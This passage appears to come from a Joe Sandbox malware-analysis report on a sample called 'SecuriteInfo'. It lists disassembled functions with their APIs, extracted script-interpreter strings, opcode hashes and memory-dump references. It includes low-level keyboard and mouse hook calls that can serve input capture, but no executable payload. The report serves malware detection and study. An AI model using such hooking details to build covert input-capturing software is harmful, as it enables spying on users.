Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AsyncState
String ID: @$@
API String ID: 425341421-149943524
Opcode ID: 70934df41858e0e741c81e8c47240bf9b7d36f7769011bd783cd64d9fa13b8db
Instruction ID: 915a1f11ca7bd22b19a4a5d203fe9d5325854c5b5d3a717e53620f4a917308b7
Opcode Fuzzy Hash: 70934df41858e0e741c81e8c47240bf9b7d36f7769011bd783cd64d9fa13b8db
Instruction Fuzzy Hash: 08B1F4702583844AF721D725C811BEBBFB59B87340F08446EE6D04B3D2D6E998C8DB6B

Function 00416C60 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 180COMMON

Download Yara Rule

Strings

HJ, xrefs: 00416CB8
@J, xrefs: 00416CFB
J, xrefs: 00416DF2
@J, xrefs: 00416D60
HJ, xrefs: 00416D0A
pJ, xrefs: 00416E14

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: J$@J$@J$HJ$HJ$pJ
API String ID: 0-1847935337
Opcode ID: 436581dde553a6a53151be017f5bd67ede86783a6b64ef41c55f565e71786843
Instruction ID: b13a7b7324f9dfc34d599ecdb278d7b74d6ac5fe48701b87140176e80c12c368
Opcode Fuzzy Hash: 436581dde553a6a53151be017f5bd67ede86783a6b64ef41c55f565e71786843
Instruction Fuzzy Hash: A451A1757003019BEB20DB6AEC45BA777E8AB11704F46453EA855D3391DB3CEC84C6AD

Function 0045C340 Relevance: 25.2, APIs: 2, Strings: 12, Instructions: 670COMMON

Download Yara Rule

Strings

Tab name doesn't exist yet., xrefs: 0045CB37
Parameter #2 invalid., xrefs: 0045C7F5
Out of memory., xrefs: 0045C68E
Could not create window., xrefs: 0045C710
Parameter #3 invalid., xrefs: 0045CA86
Parameter #1 invalid., xrefs: 0045C3C1
Off, xrefs: 0045CB9B
Menu does not exist., xrefs: 0045C8BD
Invalid Gui name., xrefs: 0045C388
NoHide, xrefs: 0045C91B
Exact, xrefs: 0045CAA5
+LastFoundExist, xrefs: 0045C4F2

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoui64
String ID: +LastFoundExist$Could not create window.$Exact$Invalid Gui name.$Menu does not exist.$NoHide$Off$Out of memory.$Parameter #1 invalid.$Parameter #2 invalid.$Parameter #3 invalid.$Tab name doesn't exist yet.
API String ID: 3882282163-1365390790
Opcode ID: e2dc8d089b58d5e21ab1f62ce5b2684992becfa77336702aa7dc4068334a1948
Instruction ID: edfc08f88665650513ea44fa0a16900d4d38066f1a65e519fa3a67a678d7c31b
Opcode Fuzzy Hash: e2dc8d089b58d5e21ab1f62ce5b2684992becfa77336702aa7dc4068334a1948
Instruction Fuzzy Hash: 4632EFB1A043059FD720DF64D8C1B2B7BA5AB85705F04092EFD458B342E779ED48CB9A

Function 004586D0 Relevance: 23.6, APIs: 11, Strings: 1, Instructions: 2601COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00458C8E

Part of subcall function 0048A030: __atof_l.LIBCMT ref: 0048A03A

__wcstoi64.LIBCMT ref: 0045A218

Part of subcall function 00489461: __wcstoi64.LIBCMT ref: 0048946D

Strings

Out of memory., xrefs: 0045A309, 0045A333, 0045A510

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64$__atof_l_memmove
String ID: Out of memory.
API String ID: 3436948139-4087320997
Opcode ID: 0f09f638ee49d1f3dddc3825ce5b49c1fb099f00f05f7a29c780834c91bf54c2
Instruction ID: c3954af76f3258af9fcc9c3b09b1de1b06e727ac4f6fd49a0e86e1051d0da377
Opcode Fuzzy Hash: 0f09f638ee49d1f3dddc3825ce5b49c1fb099f00f05f7a29c780834c91bf54c2
Instruction Fuzzy Hash: 1723A0B0900205CFDF14DF54C480BAABBB1BF49305F2881AADC499B356DB39DC59CB9A

Function 00424610 Relevance: 22.8, Strings: 17, Instructions: 1505COMMON

Download Yara Rule

Strings

Unexpected "]", xrefs: 00426373
Out of memory., xrefs: 004249FD, 00425713, 00425A8A
Unexpected "}", xrefs: 0042637D, 00426389
Expression too long, xrefs: 004265BB
Ambiguous or invalid use of ".", xrefs: 00425AC7, 00425AD7
Unexpected ")", xrefs: 00425C05, 00425C0C
Too many parameters passed to function., xrefs: 00426397
Blank parameter, xrefs: 004263CC
Missing ")" before ":", xrefs: 00426400
Missing "]" before ":", xrefs: 00426411
Too few parameters passed to function., xrefs: 004263BA
This character is not allowed here., xrefs: 00425AB9
<>=/|^,:*&~!()[]{}+-?., xrefs: 0042522F, 00425369, 0042538B, 004253C0, 004253DC, 00425601, 0042561B
Unsupported method call syntax., xrefs: 004263DE
A ":" is missing its "?", xrefs: 004263EF
Missing "key:" in object literal., xrefs: 004263A8
Missing "}" before ":", xrefs: 00426422

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: <>=/|^,:*&~!()[]{}+-?.$A ":" is missing its "?"$Ambiguous or invalid use of "."$Blank parameter$Expression too long$Missing ")" before ":"$Missing "]" before ":"$Missing "key:" in object literal.$Missing "}" before ":"$Out of memory.$This character is not allowed here.$Too few parameters passed to function.$Too many parameters passed to function.$Unexpected ")"$Unexpected "]"$Unexpected "}"$Unsupported method call syntax.
API String ID: 0-1961236605
Opcode ID: 8f9587258c673c196d21b05a189c92a715d8cda51fd1117a921ffbbada626927
Instruction ID: 06cbfc1e98936a7518e63e6ac772030494acdc382f9518df852c740134e8af3e
Opcode Fuzzy Hash: 8f9587258c673c196d21b05a189c92a715d8cda51fd1117a921ffbbada626927
Instruction Fuzzy Hash: 02D2DE70B00625DFDB24CF58E4847AEBBF1EB45314FA980ABC8459B341D779AD81CB89

Function 00446620 Relevance: 18.3, APIs: 5, Strings: 5, Instructions: 787COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00446740
__fassign.LIBCMT ref: 0044679C
_memset.LIBCMT ref: 0044683F

Strings

Int, xrefs: 004467B9
This DllCall requires a prior VarSetCapacity., xrefs: 00446B0E
DllCall, xrefs: 00446686, 004467D7, 00446B64
CDecl, xrefs: 00446734, 00446796
, xrefs: 004466E3

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign$_memset
String ID: $CDecl$DllCall$Int$This DllCall requires a prior VarSetCapacity.
API String ID: 926286438-3585077685
Opcode ID: ab1e04c86e150aa876a5915f86d679123c072427200d3cbeba1af5d3f19c0a37
Instruction ID: a2a8bd612a9f4f7b57295d35787f3cfa0f4250a56f2168647551f35157566d7a
Opcode Fuzzy Hash: ab1e04c86e150aa876a5915f86d679123c072427200d3cbeba1af5d3f19c0a37
Instruction Fuzzy Hash: 5252E4B0A006059FEB10DF54C8417AAB7B1FF47308F26856FE805AB391D779AC45CB9A

Function 004094F0 Relevance: 7.6, APIs: 5, Instructions: 114threadwindowCOMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(0000000D,Function_00004DC0,?,00000000), ref: 00409583
UnhookWindowsHookEx.USER32(?), ref: 0040959C
SetWindowsHookExA.USER32(0000000E,Function_00004F30,?,00000000), ref: 004095DF
UnhookWindowsHookEx.USER32(?), ref: 004095F3
PostThreadMessageA.USER32(00001B20,00000417,?,00000000), ref: 00409620

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: HookWindows$Unhook$MessagePostThread
String ID:
API String ID: 2701286432-0
Opcode ID: 36f16c50496441d7669423eb9a72b4ce2351fab1d3fb9dbf8eba9cd358dbb62a
Instruction ID: 514f2d8eb2ed1350a69a7f1edf8f08916161cc219c5243fbb1692705254e4406
Opcode Fuzzy Hash: 36f16c50496441d7669423eb9a72b4ce2351fab1d3fb9dbf8eba9cd358dbb62a
Instruction Fuzzy Hash: 6B31D772644301BEEB21CF26DC45B273A989B91708F04043BE940A72D2D6BADD84CB5E

Function 00486A60 Relevance: 7.1, Strings: 5, Instructions: 897COMMON

Download Yara Rule

Strings

ERCP, xrefs: 00486B3B
VUUU, xrefs: 00486EFB
VUUU, xrefs: 00486E6F
VUUU, xrefs: 00486E84
VUUU, xrefs: 00486EA8

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 60b15e5193799233b02077def55179f46d0775e66e92c9efa57bb83615ac91ad
Instruction ID: 949a008389ee45f65dc280dd68e894c4b57d481489f64d8c2d6c64645872225f
Opcode Fuzzy Hash: 60b15e5193799233b02077def55179f46d0775e66e92c9efa57bb83615ac91ad
Instruction Fuzzy Hash: 8472A03160C3518BCB24DF18C49076FBBE1AB85714F298E5FE89997381D339D885CB96

Function 004083B0 Relevance: 3.8, APIs: 2, Instructions: 844COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040848F
_memset.LIBCMT ref: 004084A1

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: ff905f8484571a7290440af53475690fb3a7dae49b4bbfd510491c8994fcd26f
Instruction ID: a7910162b71a34c5d3311c43d21260878dada69bc55911b62db7ae2e8039866c
Opcode Fuzzy Hash: ff905f8484571a7290440af53475690fb3a7dae49b4bbfd510491c8994fcd26f
Instruction Fuzzy Hash: E782E4705083818EE725CF25C5547B2BBE0BF56308F0885BED8C55B3E2DBB9A948C75A

Function 00416E04 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00416E26

Strings

pJ, xrefs: 00416E14

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DeleteObject
String ID: pJ
API String ID: 1531683806-3096217578
Opcode ID: 4a8e2294f1d2960009fe925be84511e24d54d08f9e652282d312e885a40f0b1d
Instruction ID: 7442c6f5e165499bffd7f457b242b39f8fe793d22b02d94135aa6a707f984ded
Opcode Fuzzy Hash: 4a8e2294f1d2960009fe925be84511e24d54d08f9e652282d312e885a40f0b1d
Instruction Fuzzy Hash: 92F06875600381DAE7258769ED487E63F94A712304F06467BD855C26A0C77CD8C8C75D

Function 00474300 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

%04d%02d, xrefs: 004744B9

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: %04d%02d
API String ID: 0-2611399059
Opcode ID: 9786305cf735b40b28e9c0c7d994c6282a1dc7c1239a6adc7aa95bacf29ecedc
Instruction ID: 079f4b59f191a5baabf463dca472ffcc2e4717f7e722c1dc27defbd46ad4a150
Opcode Fuzzy Hash: 9786305cf735b40b28e9c0c7d994c6282a1dc7c1239a6adc7aa95bacf29ecedc
Instruction Fuzzy Hash: 3D41D662B1411647C709883DCD563B6998BABE9704F58C337E6CCCF3D9EB28ED065284

Function 0049371D Relevance: .2, Instructions: 180COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
Instruction ID: 4ffc91948d63a45404ac5e5bfd3a6c906fdf31d2b5a7ccb4d4a43c38db049f9d
Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
Instruction Fuzzy Hash: C26148B1A003158FCF18CF49C4946AABBF2FF85315F1AC5AEE8095B361C7B59A54CB84

Function 004080E0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e4f874815ee760f27c5a8d394161a2b9e2656fa4f507e5568db7478bd83a19f
Instruction ID: f03505b307c0e1e5014042dc683bb0c25d4f9fc7c39bd486500467bdadb47771
Opcode Fuzzy Hash: 5e4f874815ee760f27c5a8d394161a2b9e2656fa4f507e5568db7478bd83a19f
Instruction Fuzzy Hash: 0F41CFA75189510FFB100919B4F23F3ABD2CBB2332F15856AD1D447BC3D22A598FE654

Function 004124A0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dc2e100ed300df787e30aeeffbe50b52e58aba4099b997314d54ce539fcd49
Instruction ID: 26568ef6c7ce061bc4d4f4010e968c2d267bc34c16d267dd752ed11d525eb105
Opcode Fuzzy Hash: 77dc2e100ed300df787e30aeeffbe50b52e58aba4099b997314d54ce539fcd49
Instruction Fuzzy Hash: 0B41B2705083419ED711CF25D5A07E6BFE6EF92354F08446FE1C5872A2C3B888D8CBAA

Function 004147A0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 094e2c2d44431e41aac82c6e6ae2f14828d185cda1e3ff40c2952f810ae8bf4c
Instruction ID: 20b0dd9426146db6d933b80378af7063f49dcbfa9964fd046879f83545b556fa
Opcode Fuzzy Hash: 094e2c2d44431e41aac82c6e6ae2f14828d185cda1e3ff40c2952f810ae8bf4c
Instruction Fuzzy Hash: C011C83193151087E314CF3AD841566B7D2EBE5304B28CB6DE4A7836D5DB39A9019B88

Function 004147B5 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97705a2c817d44136973802e14221875122e373d1d9a650f08a726fee844414c
Instruction ID: 620572c05445152580f30c8fce14d107abd5d8bd081f2e72154dc003baef57fa
Opcode Fuzzy Hash: 97705a2c817d44136973802e14221875122e373d1d9a650f08a726fee844414c
Instruction Fuzzy Hash: FF11C23263051087E314CF3AD881566B7E3EBE5304728CB6DE4B7872C5DF39A9029B88

Function 00417520 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
